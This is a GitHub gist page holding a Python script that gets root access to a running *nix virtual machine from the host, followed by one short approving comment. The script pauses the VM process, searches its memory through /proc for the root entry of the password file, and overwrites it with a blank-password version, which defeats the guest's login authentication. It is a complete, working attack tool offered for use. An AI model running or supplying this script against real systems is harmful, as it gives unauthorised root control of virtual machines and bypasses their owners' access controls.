Skip to content

Instantly share code, notes, and snippets.

@DavidBuchanan314
Last active November 17, 2023 07:34
  • Star 10 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save DavidBuchanan314/7a8bc1e9cc1b28f43b5cadd4447e7d5b to your computer and use it in GitHub Desktop.
Get root any running *nix VM by patching it's memory from the host.
#!/usr/bin/python3
import sys
import os
import signal
PATTERN = b"root:x:0:0:root"
REPLACE = b"root::00:0:root"
if len(sys.argv) != 2:
print("USAGE: python3 {} PID".format(sys.argv[0]))
print("(root privs required)")
exit()
pid = int(sys.argv[1])
os.kill(pid, signal.SIGSTOP)
mem = open("/proc/{}/mem".format(pid), "wb+")
for mapping in open("/proc/{}/maps".format(pid)).readlines():
if mapping.strip().split()[-1] in ["[vvar]", "[vdso]", "[stack]", "[vsyscall]"]:
continue
addrs = mapping.split()[0]
start, end = [int(x, 16) for x in addrs.split("-")]
mem.seek(start)
for block in range(start, end, 0x1000):
try:
buf = mem.read(0x1000)
if PATTERN in buf:
print(mapping.strip())
print("w00t")
buf = buf.replace(PATTERN, REPLACE)
mem.seek(block)
mem.write(buf)
print("w00tw00t")
except OSError:
pass
os.kill(pid, signal.SIGCONT)
@ThatNerdyPikachu
Copy link

wish you can react to a gist..

👍

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment